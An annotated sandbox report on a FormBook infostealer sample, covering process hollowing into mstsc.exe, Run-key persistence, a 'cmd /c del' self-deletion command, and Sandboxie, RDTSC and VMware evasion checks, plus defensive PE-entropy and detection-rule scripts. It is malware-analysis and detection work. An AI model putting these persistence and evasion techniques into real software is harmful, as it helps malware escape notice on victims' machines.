Note: the payload is visible in three places. In a PAGE_READWRITE region of the .NET loader (process 01, 0x41E1000) before injection; at the image base 0x400000 of the hollowed child kayx.exe (process 11, in both its 00000001 and 00000002 dumps, plus private executable regions at 0x830000 and 0x980000); and inside mstsc.exe (process 15, at 0x2F00000 and 0xA00000). Two independent rules (an auto-generated Malpedia signature and JPCERT/CC's hand-written one) agreeing on every region makes the family attribution solid.
Source: kayx.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: firefoxe.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: kayx.exe, firefoxe.exe.1.dr, 1.0.kayx.exe.ec0000.0.unpack, 1.2.kayx.exe.ec0000.0.unpack, 15.2.kayx.exe.200000.0.unpack, 15.0.kayx.exe.200000.0.unpack, 16.0.kayx.exe.2c0000.0.unpack, 16.2.kayx.exe.2c0000.0.unpack, 17.0.kayx.exe.400000.0.unpack, 19.0.firefoxe.exe.9a0000.0.unpack, 19.2.firefoxe.exe.9a0000.0.unpack; u0006/u0005.cs | Cryptographic APIs: 'TransformFinalBlock'
Note: TransformFinalBlock is the System.Security.Cryptography.ICryptoTransform method that completes a managed encrypt/decrypt operation. Its use from a type with the obfuscated name u0006/u0005.cs, in the on-disk sample, in every kayx.exe instance and in the dropped firefoxe.exe, is the .NET loader decrypting its embedded payload at run time. The dropped file has the same single .text section with the same flags and the same decryption routine, consistent with firefoxe.exe being a copy of the loader.
Source: classification engine | Classification label: mal100.troj.evad.winEXE@14/3@4/2
Source: C:\Users\user\Desktop\kayx.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01 (conhost's own WIL error-reporting mutex, not sample activity)
Source: kayx.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kayx.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 times)
Note: the native image of mscorlib for .NET Framework 4 (32-bit) is loaded by both kayx.exe and firefoxe.exe, confirming both are managed executables running under the same runtime.
Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
Source: C:\Users\user\Desktop\kayx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policies lookup performed when a managed image starts; no signal on its own)
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 times; the hosts file is consulted during name resolution, here from explorer.exe)
Source: kayx.exe | Virustotal: Detection: 34%
Source: kayx.exe | ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\kayx.exe | File read: C:\Users\user\Desktop\kayx.exe
Source: unknown | Process created: C:\Users\user\Desktop\kayx.exe 'C:\Users\user\Desktop\kayx.exe'
Source: unknown | Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe (3 times)
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' (2 times)
Source: unknown | Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kayx.exe | Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe (3 times)
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
Note: read together, the creation lines give this chain. kayx.exe (process 01, the .NET loader) starts kayx.exe three times (process indices 0F, 10 and 11); the last of those children is the one whose image at 0x400000 the Yara scan identifies as FormBook, i.e. the loader hollows its own child. mstsc.exe, the 32-bit Remote Desktop client from SysWOW64, appears with no attributed parent, is itself found carrying the payload, and is the process that runs cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe' to remove the original sample. explorer.exe, not the sample, starts the persistent copy firefoxe.exe (twice, process indices 13 and 14). A Remote Desktop client spawning cmd.exe to delete an executable from a user's Desktop has no benign explanation and is a detection in itself.
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32
Source: C:\Users\user\Desktop\kayx.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: kayx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR header: a managed executable)
Source: kayx.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT (the defaults the C# compiler emits, not hardening chosen by the author)
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: kayx.exe, 00000011.00000003.351692207.0000000000AB0000.00000004.00000001.sdmp, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: kayx.exe, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL | source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdb | source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp
Note: wntdll.pdb is the debug record of ntdll.dll. Finding it in a private read/write region of process 11 (0xAB0000) and in a private executable region of mstsc.exe (0x4CAF000, protection 00000040), rather than only at the loaded module's base, is what a second, manually mapped copy of ntdll.dll looks like; FormBook is known to use such a copy to reach native functions without passing through hooked exports, although this report records only the string, not its use. mstsc.pdb in executable private memory of process 11 (0x2B00000) is consistent with the mstsc.exe image being staged in the kayx.exe child before the injection. wscui.pdb belongs to explorer.exe's own Security Center UI module and is background noise.

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\kayx.exe | Unpacked PE file: 17.2.kayx.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
Note: the on-disk kayx.exe has a single .text section (execute/read), while the image found at 0x400000 in process 11 after execution has .text (execute/read) plus read-only .rsrc and .reloc sections. The section table changed because a different PE, the native FormBook payload, was written over the hollowed child's image.
Source: C:\Users\user\Desktop\kayx.exe | Code function: 1_2_0185A9A1 push edx; iretd
Source: C:\Users\user\Desktop\kayx.exe | Code function: 1_2_05C48CE3 push E808AB5Eh; retf
Source: C:\Users\user\Desktop\kayx.exe | Code function: 1_2_05C48C8D push E808AB5Eh; retf
Source: C:\Users\user\Desktop\kayx.exe | Code functions 17_2_0041AD55, 17_2_0041ADA2, 17_2_0041ADAB, 17_2_0041AE0C: push eax; ret
Source: C:\Users\user\Desktop\kayx.exe | Code functions 17_2_00414EC5, 17_2_00414E85: push CFF27278h; ret
Source: C:\Users\user\Desktop\kayx.exe | Code functions 17_2_00414740, 17_2_0041478D: push cs; iretd
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00E5D0D1 push ecx; ret
Source: C:\Users\user\Desktop\kayx.exe | Code functions 17_1_0041AD55, 17_1_0041ADA2, 17_1_0041ADAB, 17_1_0041AE0C: push eax; ret
Source: C:\Users\user\Desktop\kayx.exe | Code functions 17_1_00414EC5, 17_1_00414E85: push CFF27278h; ret
Source: C:\Users\user\Desktop\kayx.exe | Code functions 17_1_00414740, 17_1_0041478D: push cs; iretd
Note: push value; ret is a jump written without a jmp; it breaks linear-sweep disassembly and call-graph recovery. push cs; iretd and push imm32; retf are interrupt-return and far-return sequences that compilers do not emit for 32-bit user-mode code; inside a function body they mean either data being disassembled as code or a deliberate anti-disassembly gadget. Treat these addresses as candidates for manual review, not as confirmed control flow; the 17_1_ and 17_2_ lists are the same addresses seen in two analysis passes.
Source: initial sample | Static PE information: section name: .text entropy: 7.94131868162 (reported twice)
Note: 7.94 bits per byte, against a maximum of 8, over the whole .text section means the code section is almost entirely compressed or encrypted data, consistent with a .NET loader that decrypts its payload at run time (the TransformFinalBlock entries above).
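The section-rights comparison (.text:ER;.rsrc:R;.reloc:R; vs .text:ER;) and the .text entropy above are both products of reading the PE section table. The following script is an added example, not part of the Joe Sandbox report or of any analysis tool it uses: it walks the section table of a PE32 image with nothing but the standard library, renders each section's rights in the report's E/R/W shorthand, computes the Shannon entropy of each section's raw bytes, and flags executable sections whose entropy says "packed". A two-section PE is constructed inline (the .text filler is a deterministic SHA-256 chain standing in for encrypted code) so it runs offline; for a real sample replace build_sample_pe() with open(path, "rb").read(). Running it twice, once on the dropped file and once on a memory dump of the hollowed process, gives the two sides of the report's comparison.

```python
import hashlib
import math
import struct

# Section characteristics from winnt.h (the same flags the report prints by name).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_HEADER = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant or empty input, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def rights_string(characteristics: int) -> str:
    """The report's shorthand: E = execute, R = read, W = write."""
    return ("E" if characteristics & IMAGE_SCN_MEM_EXECUTE else "") + \
           ("R" if characteristics & IMAGE_SCN_MEM_READ else "") + \
           ("W" if characteristics & IMAGE_SCN_MEM_WRITE else "")


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table and describe
    every section: name, rights, raw size, entropy of its raw bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine(2) NumberOfSections(2) TimeDateStamp(4) PointerToSymbolTable(4)
    # NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    num_sections, opt_size = struct.unpack_from("<2xH12xH2x", pe, coff)
    table = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr, _, _, _, _, chars = \
            struct.unpack_from(SECTION_HEADER, pe, table + i * 40)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "characteristics": chars,
            "rights": rights_string(chars),
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(raw), 4),
        })
    return sections


def section_summary(sections: list) -> str:
    """Same shape as the report's unpacking line, e.g. '.text:ER;.rsrc:R;'."""
    return "".join(f"{s['name']}:{s['rights']};" for s in sections)


def packed_sections(sections: list, threshold: float = 7.0) -> list:
    """Executable sections whose entropy exceeds threshold: compressed or encrypted
    code that will be unpacked at run time."""
    return [s["name"] for s in sections
            if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > threshold]


def _deterministic_noise(n: int) -> bytes:
    """SHA-256 chain: high-entropy filler standing in for packed code (constructed)."""
    out, block = bytearray(), b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed PE32 with a packed-looking .text and a flat .rsrc; the optional
    header is zero-filled because the section walk only needs its size."""
    text, rsrc, hdr_size, opt_size = _deterministic_noise(4096), b"A" * 1024, 0x200, 0xE0
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)    # i386, 2 sections
    sec_text = struct.pack(SECTION_HEADER, b".text", len(text), 0x1000, len(text), hdr_size,
                           0, 0, 0, 0, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    sec_rsrc = struct.pack(SECTION_HEADER, b".rsrc", len(rsrc), 0x3000, len(rsrc), hdr_size + len(text),
                           0, 0, 0, 0, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + sec_text + sec_rsrc).ljust(hdr_size, b"\0")
    return headers + text + rsrc


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    print(section_summary(secs))
    for s in secs:
        print(f"{s['name']:8} rights={s['rights']:3} size={s['raw_size']:6} entropy={s['entropy']}")
    print("packed:", packed_sections(secs))
```

The 7.0 threshold is a working default: ordinary compiled x86 code lands around 6.0 to 6.7 bits per byte, while compressed or encrypted sections sit above 7.5, as the 7.94 of this sample does. A memory dump of a hollowed process taken after unpacking should show the opposite picture, a .text section with normal code entropy and the extra .rsrc/.reloc sections the report lists.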
Source: C:\Users\user\Desktop\kayx.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe (dropped file)
Source: C:\Users\user\Desktop\kayx.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped
Source: C:\Users\user\Desktop\kayx.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\kayx.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxe (written twice)
Source: C:\Windows\explorer.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Note: persistence is a per-user Run value named firefoxe, and the executable it launches lives in a folder named noteped under the user's Start Menu\Programs directory, a location that normally holds .lnk shortcuts rather than executables. The Zone.Identifier alternate data stream written alongside the copy is the Mark-of-the-Web. Both the Run value and the drop location are user-writable, so the whole persistence step needs no elevation and leaves no trace under HKLM or in the service database.
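The process-creation lines (kayx.exe starting copies of itself, explorer.exe launching firefoxe.exe from under Start Menu\Programs, mstsc.exe running cmd.exe /c del against the original sample) and the persistence lines above each describe a pattern that can be turned into a detection over endpoint telemetry. The script below is an added example, not part of the report: it applies four such rules to a list of Sysmon-style event dictionaries. The events are constructed here to mirror the report's process tree; the event format, the rule names and the data of the Run value (assumed to point at the dropped copy, since the report only names the value) are assumptions of this example, not something the page records.

```python
import re
from collections import Counter

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)
START_MENU_EXE_RE = re.compile(r"\\Start Menu\\Programs\\.*\.exe$", re.I)
DEL_CMD_RE = re.compile(r"/c\s+del\s+['\"]?([^'\"]+\.exe)", re.I)
SHELLS = {"cmd.exe", "explorer.exe", "powershell.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: list) -> list:
    """Apply four rules to Sysmon-style events; returns (rule, detail) tuples."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            image, parent, cmd = ev["image"], ev.get("parent", ""), ev.get("cmdline", "")
            # 1. A process starting a copy of its own image: the loader's stager
            #    pattern that precedes hollowing the child.
            if parent and parent.lower() == image.lower():
                findings.append(("self_spawn", image))
            # 2. cmd.exe running 'del' on a user-profile executable, launched by a
            #    Windows binary that is not a shell (here mstsc.exe): self-deletion
            #    driven from an injected host.
            if basename(image) == "cmd.exe" and parent.lower().startswith("c:\\windows\\") \
                    and basename(parent) not in SHELLS:
                m = DEL_CMD_RE.search(cmd)
                if m and re.search(r"\\Users\\", m.group(1), re.I):
                    findings.append(("self_delete_via_system_binary", f"{basename(parent)} -> del {m.group(1)}"))
            # 3. explorer.exe launching an .exe that lives under Start Menu\Programs,
            #    a folder meant for .lnk shortcuts.
            if basename(parent) == "explorer.exe" and START_MENU_EXE_RE.search(image):
                findings.append(("start_menu_exe_launch", image))
        elif ev["type"] == "registry":
            # 4. Run/RunOnce value whose data points into a user-writable AppData path.
            if RUN_KEY_RE.search(ev["key"]) and USER_WRITABLE_RE.search(ev.get("data", "")):
                findings.append(("run_key_user_writable", f"{ev['value']} = {ev['data']}"))
    return findings


def rule_counts(events: list) -> dict:
    """How often each rule fired, for a quick triage view."""
    return dict(Counter(rule for rule, _ in evaluate(events)))


KAYX = r"C:\Users\user\Desktop\kayx.exe"
FIREFOXE = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"
MSTSC = r"C:\Windows\SysWOW64\mstsc.exe"

# Constructed telemetry mirroring the report's process tree (not exported from the
# sandbox). The Run value's data is an assumption: the report names only the value.
SAMPLE_EVENTS = [
    {"type": "process", "image": KAYX, "parent": "", "cmdline": f"'{KAYX}'"},
    {"type": "process", "image": KAYX, "parent": KAYX, "cmdline": KAYX},
    {"type": "process", "image": KAYX, "parent": KAYX, "cmdline": KAYX},
    {"type": "process", "image": KAYX, "parent": KAYX, "cmdline": KAYX},
    {"type": "process", "image": FIREFOXE, "parent": r"C:\Windows\explorer.exe", "cmdline": f"'{FIREFOXE}'"},
    {"type": "process", "image": MSTSC, "parent": "", "cmdline": MSTSC},
    {"type": "process", "image": r"C:\Windows\SysWOW64\cmd.exe", "parent": MSTSC, "cmdline": f"/c del '{KAYX}'"},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "firefoxe", "data": FIREFOXE},
    # Benign control: explorer starting an ordinary program must not fire any rule.
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
    print(rule_counts(SAMPLE_EVENTS))
```

Rule 1 fires on its own for legitimate software that relaunches itself (installers, browsers), so in production it is a scoring input rather than an alert; rules 2 and 3 are high-confidence on their own, and rule 4 is the one to baseline against the environment's known Run entries before enabling.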
Source: C:\Users\user\Desktop\kayx.exe | Process information set: NOOPENFILEERRORBOX (20 times)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (11 times)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe | Process information set: NOOPENFILEERRORBOX (32 times)
Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Note: these are SetErrorMode calls. SEM_NOOPENFILEERRORBOX (0x8000) only suppresses the dialog shown when a file the loader needs cannot be found; it is set by a great deal of ordinary software and carries no signal by itself. The mstsc.exe entry is the one worth keeping: it additionally sets SEM_NOGPFAULTERRORBOX (0x0002), which suppresses the Windows Error Reporting dialog on an unhandled fault, so a crash of the injected payload inside the Remote Desktop client dies silently instead of alerting the user.

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: kayx.exe, 00000001.00000002.355951256.0000000005BC0000.00000004.00000001.sdmp, firefoxe.exe, 00000013.00000002.488821328.0000000005540000.00000004.00000001.sdmp, firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLLHEAD%YCLYIDUONHMGOW.VBSKCREATEOBJECT("WSCRIPT.SHELL").RUN """
Note: SbieDll.dll is the user-mode DLL Sandboxie loads into every sandboxed process; its name in the decrypted data of the loader (process 01) and of both firefoxe.exe instances (13 and 14) is the string a GetModuleHandle-style check compares against. The rest of the same string (a .vbs file name and a CreateObject("WScript.Shell").Run fragment) shows that the same decrypted blob also carries a VBScript launcher.
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\kayx.exe | RDTSC instruction interceptor: First address: 00000000004083C4, second address: 00000000004083CA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kayx.exe | RDTSC instruction interceptor: First address: 000000000040875E, second address: 0000000000408764, same instruction sequence
Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 0000000002F083C4, second address: 0000000002F083CA, same instruction sequence
Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 0000000002F0875E, second address: 0000000002F08764, same instruction sequence
Source: C:\Users\user\Desktop\kayx.exe | Code function: 17_2_00408690 rdtsc
Note: the two kayx.exe hits lie at 0x4083C4 and 0x40875E in the payload image based at 0x400000; the two mstsc.exe hits lie at the same offsets (0x83C4 and 0x875E) from 0x2F00000, the region where the Yara scan found the FormBook payload inside mstsc.exe. Same code, different base: the copy injected into mstsc.exe is byte-identical at these points. The sequence reads the time-stamp counter twice with two instructions in between; a delta far above the handful of cycles that takes on bare metal exposes a hypervisor that traps RDTSC or a debugger single-stepping the code.
          Source: C:\Users\user\Desktop\kayx.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\kayx.exe TID: 6564Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmpBinary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000012.00000000.366341161.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&}
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000012.00000000.373649853.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000012.00000000.367147757.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000012.00000000.367196676.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
